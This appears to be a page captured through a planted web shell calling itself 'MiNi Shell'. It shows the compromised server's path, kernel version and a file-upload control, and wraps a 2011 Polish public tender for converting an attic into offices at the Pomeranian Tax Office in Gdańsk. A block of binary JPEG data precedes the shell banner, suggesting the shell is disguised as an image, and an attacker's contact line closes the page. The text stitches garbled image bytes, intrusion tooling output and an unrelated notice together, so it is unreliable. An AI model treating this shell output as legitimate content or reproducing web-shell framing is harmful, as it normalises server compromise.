JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/153863-N-2011.html

<p class="kh_header"><b>Gdańsk: Postępowanie o udzielenie zamówienia publicznego na robotę budowlaną w trybie przetargu nieograniczonego na przebudowę poddasza na pokoje biurowe dla potrzeb organu egzekucyjnego w budynku Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4-6</b><br>
<b>Numer ogłoszenia: 153863 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorski Urząd Skarbowy w Gdańsku , ul. Żytnia 4/6, 80-749 Gdańsk, woj. pomorskie, tel. 0-58 69 05 937, faks 0-58 69 05 991.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego na robotę budowlaną w trybie przetargu nieograniczonego na przebudowę poddasza na pokoje biurowe dla potrzeb organu egzekucyjnego w budynku Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4-6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis prac adaptacyjnych
Adaptacja pomieszczeń strychowych na biura 

W miejscach projektowanych otworów drzwiowych w ścianie istniejącego korytarza 4.2 dokonać rozbiórki wymaganych fragmentów istniejącej obudowy z płyt g-k na stelażu stalowym od strony w/w korytarza; od strony projektowanych pomieszczeń osadzić L100x100x8 i dokonać rozbiórki wymaganych fragmentów ściany ceglanej.  
Lokalizacja proj. otworów drzwiowych na rys.A-5 ; zgodnie z opisem na w/w rys. i zestawieniem stolarki rys. A-9 osadzić drzwi.

Wykonanie drewnianej konstrukcji nośnej stropu w adaptowanym pomieszczeniu 4.12 z belek drewnianych 6/16 w rozstawie co ~ 0,80m. Projektowane  belki podwieszać do istniejącej płatwi 14/18 za pomocą typowych stalowych połączeń kątowych do konstrukcji drewnianych i oprzeć na istniejącej ścianie murowanej korytarza. Układ projektowanych  belek wg rys. K1. Wykonać sufit i obudowę skosów w systemie lekkiej zabudowy poddasza zgodnie z AT ITB dla wybranego systemu. Układ warstw zgodnie z opisem na rys.A-7. Wymagania dla przegrody - klasa odporności ogniowej EI60. W pomieszczeniu 4.13 uzupełnić istniejącą obudowę w zakresie dokonanej rozbiórki - rozwiązanie i wymagania  jak wyżej.
      
Wykonanie ścianek działowych:
- grubości 20,5cm - oddzielająca projektowane pomieszczenia od siebie. Lokalizacja ścianek zgodnie z rys.A-5                       
Ścianki wykonać w systemie lekkiej zabudowy zgodnie z AT ITB dla wybranego systemu.
Wymagania dla przegrody  -  klasa odporności ogniowej EI30
 -  izolacyjność akustyczna   45dB
 Wymagania dla obudowy istn. słupów drewnianych - klasa odporności ogniowej EI60.  
   
- grubości 10cm - oddzielająca projektowane pomieszczenie 4.12f od istniejących pomieszczeń strychowych.
Lokalizacja ścianki zgodnie z rys.A5 Ściankę wykonać w systemie lekkiej zabudowy zgodnie z AT ITB dla wybranego systemu. Wymagania dla przegrody - klasa odporności ogniowej EI60
         
Wykonanie obudowy od strony adaptowanych pomieszczeń na istniejącej ścianie murowanej  oddzielającej  projektowane pomieszczenia od istniejącego korytarza komunikacji ogólnej. Projektowaną obudowę grubości 7,5 cm wykonać w systemie lekkiej zabudowy zgodnie z AT ITB dla wybranego systemu. Układ warstw zgodnie z opisem na rys.A-5. Wymagania dla przegrody - izolacyjność akustyczna 40dB.
W pomieszczeniach 4.13, 4.12d, i 4.12f należy zamontować stalowe drzwi techniczne o wymiarach 60x80 cm.  

Wykonanie obudowy jak w pkt. 10 na ścianie murowanej oddzielającej pomieszczenia  4.13 i 4.12 od strony pomieszczenia 4.12.                                                

Wykonanie obudowy na istniejącej ściance kolankowej poddasza grubości 7,5cm w systemie lekkiej zabudowy mocowanej do istniejącej konstrukcji drewnianej ściany stolcowej. Układ warstw zgodnie z opisem na rys.A-5 i A-6. Wymagania dla przegrody - klasa odporności ogniowej EI60.

Wykonanie obudowy z płyt g-k  na istniejących słupach drewnianych nie wbudowanych w projektowane ścianki działowe. Wymagania dla projektowanej obudowy - klasa odporności ogniowej R 60.

Posadzki
W projektowanych pomieszczeniach powstałych w wyniku adaptacji pomieszczenia  4.12 wykonać posadzki zgodnie z opisem na rys. A-6. W pomieszczeniu 4.12a  w miejscu przebiegu istniejącej podwaliny drewnianej wykonać podwyższenie posadzki ; układ warstw wg opisu na rys.A-6.
            
Wentylacja
Z wszystkich projektowanych pomieszczeń zgodnie z lokalizacją na rys. A-5 i A-6 dokonać wyprowadzenia przewodów wentylacji grawitacyjnej nad istniejący  dach. Przewody wykonać z rur stalowych fi 150 owiniętych 10cm warstwą wełny mineralnej w obudowie z płyt g-k. Wymagania dla projektowanej obudowy - klasa odporności ogniowej EI60.

Instalacje wewnętrzne
Projektowane pomieszczenia wyposażyć w następujące instalacje wewnętrzne:
- instalację elektryczną - wg odrębnego opracowania branżowego
- instalację teletechniczną  - wg odrębnego opracowania branżowego
- instalację grzewczą - wg odrębnego opracowania

Wykończenia wewnętrzne:
- ściany i sufity malowanie farbami akrylowymi przeznaczonymi do wymalowań wewnętrznych.

Wyposażenie 
Projektowane pomieszczenia wyposażyć zgodnie z przeznaczeniem; nie przewiduje się dodatkowego wyposażenia.

Analiza ochrony ppoż
W pomieszczeniach należy zainstalować oraz podłączyć czujki ostrzegania o pożarze do istniejącej centrali.

Instalacja c.o.
W pomieszczeniach należy zainstalować 7 grzejników konwektorowych. Grzejnik w pom. 4.13 zdemontować i zastąpić konwektorowym. Grzejniki o wymiarach 1200 x 600 mm. Grzejniki wyposażyć w zawory termostatyczne z nastawą wstępną. Na grzejnikach zamontować automatyczne odpowietrzniki. 
Po zakończonym montażu należy przeprowadzić próby ciśnieniowe zakończone protokołem. 

NAZWA I KOD GRUP ROBÓT:

45000000-7 Roboty budowlane
45421131-1 Instalowanie drzwi
45421146-9 Instalowanie sufitów podwieszanych
45432100-5 Kładzenie i wykładanie podłóg
45442100-8 Roboty malarskie
45315300-1 Instalacje zasilania elektrycznego
45314320-0 Instalowanie okablowania komputerowego
45331100-7 Instalowanie centralnego ogrzewania
45331210-1 Instalowanie wentylacji



Instalacje elektryczne w tym okablowanie strukturalne komputerowe i telefonicznej 
Szczegółowy opis wykonania instalacji elektrycznych oraz okablowania strukturalnego zawarty jest w opracowanych dokumentacja projektowych.
Aparaty telefoniczne muszą być cyfrowe współpracujące z istniejącą centralą firmy Alcatel.
Wykonawca zobowiązany jest wykonać kompletną dokumentację powykonawczą oraz wykonać wszelkie pomiary elektryczne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie jest wymagane</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1)	posiadania wiedzy i doświadczenia - warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, (rozpoczęcie i zakończenie realizacji zadania jest w wymienionym okresie), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej:
a)	dwie roboty budowlane - remontowe  - o wartości nie mniejszej niż 120.000 zł brutto każda, 
w przypadku Wykonawcy lub Wykonawców występujących wspólnie polegających na wiedzy i doświadczeniu innych podmiotów niezależnie od charakteru prawnego łączących ich stosunków, Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą się łącznie dwiema ww. robotami budowlanymi oraz załączą dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
b)	dwie roboty budowlane - polegające na wykonaniu okablowania komputerowego - o wartości nie mniejszej niż 100.000 zł brutto każda, w przypadku Wykonawcy lub Wykonawców występujących wspólnie polegających na wiedzy i doświadczeniu innych podmiotów niezależnie od charakteru prawnego łączących ich stosunków, Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą się łącznie dwiema ww. robotami budowlanymi oraz załączą dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1)	dysponowania osobami zdolnymi do wykonania zamówienia - warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje następującymi osobami zdolnymi do wykonania przedmiotu zamówienia:
a)	kierownikiem budowy - o specjalności konstrukcyjno-budowlanej,
b)	kierownik robót - o specjalności elektrycznej,
c)	kierownik robót o specjalności sanitarnej 
d)	osobą kierującą robotami polegającymi na wykonaniu okablowania komputerowego będącą Autoryzowanym Partnerem oferowanego Systemu okablowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek 
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - warunek zostanie spełniony, jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 200 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Do umowy w sprawie zamówienia publicznego stosuje się przepisy Kodeksu cywilnego, jeżeli przepisy ustawy nie stanowią inaczej.
2.	Projekt umowy, jaka ma zostać zawarta w efekcie przeprowadzonego postępowania o udzielenie zamówienia publicznego, stanowi ZAŁĄCZNIK NR 9 do niniejszej SIWZ.
3.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia.
4.	Dopuszczalne są zmiany postanowień umowy:
1)	dotyczące zmian inspektorów nadzoru i kierowników (budowy, robót) w następujących przypadkach:
a)	śmierci, choroby lub innych zdarzeń losowych,
b)	nie wywiązywanie się z obowiązków wynikających z przepisów prawa,
c)	jeżeli zmiana inspektora nadzoru/ kierownika stanie się konieczna z jakiejkolwiek innych przyczyn niezależnych od Zamawiającego - Wykonawcy (np. rezygnacja, rozwiązanie stosunku pracy itp.),
d)	Zamawiający może zażądać od Wykonawcy zmiany kierownika, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z przepisów prawa, w terminie wskazanym przez Zamawiającego,
2) dotyczące nazwy, siedziby firmy, konta bankowego Wykonawcy lub Zamawiającego (zmian podmiotowych),
3)	dotyczące spowodowane zmian przepisów ustaw wymienionych w Umowie, a w szczególności ustawy Prawo Budowlane, Prawo zamówień publicznych,
4)	dotyczące wprowadzenie lub zmiany Podwykonawcy robót, w następujących przypadkach:
a)	śmierci, choroby (w przypadku osób fizycznych) lub innych zdarzeń losowych,
b)	nie wywiązanie się z obowiązków wynikających z przepisów,
c)	jeżeli zmiana Podwykonawcy stanie się konieczna z jakiejkolwiek innych przyczyn niezależnych od Zamawiającego - Wykonawcy (np. rezygnacja),
5)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
6)	dotyczące przedłużenia terminu realizacji umowy w przypadku, gdy wystąpi konieczność wykonania robót dodatkowych zgodnie z art. 67 ust. 1 pkt 5 ustawy Pzp opóźniających lub wstrzymujących realizację robót zasadniczych,
7)	z powodu okoliczności siły wyższej, w szczególności zagrażającej bezpośrednio życiu lub zdrowiu ludzi lub grożącej powstaniem szkody w znaczących rozmiarach,
8)	opóźnienia wynikające z nieplanowanych inspekcji organów kontrolnych skutkujących wstrzymaniem robót, które to działania nie są konsekwencją winy, którejkolwiek ze stron umowy,
9)	zmiana podmiotu, który zobowiązał się do oddania Wykonawcy do dyspozycji niezbędnych zasobów w celu realizacji niniejszego zamówienia, pod warunkiem, że Wykonawca przedstawi zobowiązanie nowego podmiotu przed upływem ważności poprzedniego zobowiązania,
10)	Przewiduje się zmianę wynagrodzenia wykonawcy (ceny brutto) o kwotę wynikającą ze zmienionych stawek podatku VAT. Płatność będzie się dokonywać z uwzględnieniem stawki VAT obowiązującej w dniu wystawienia faktury.
Strona występująca o zmianę postanowień Umowy zobowiązana jest do udokumentowania zaistnienia okoliczności uzasadniających tę zmianę. Wniosek o zmianę postanowień Umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.us.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W budynku Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4-6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2011 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Pomorskiego Urzędu Skarbowego w Gdańsku w Gdańsku przy Żytniej 4-6 w kancelarii Urzędu pom. 1.22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com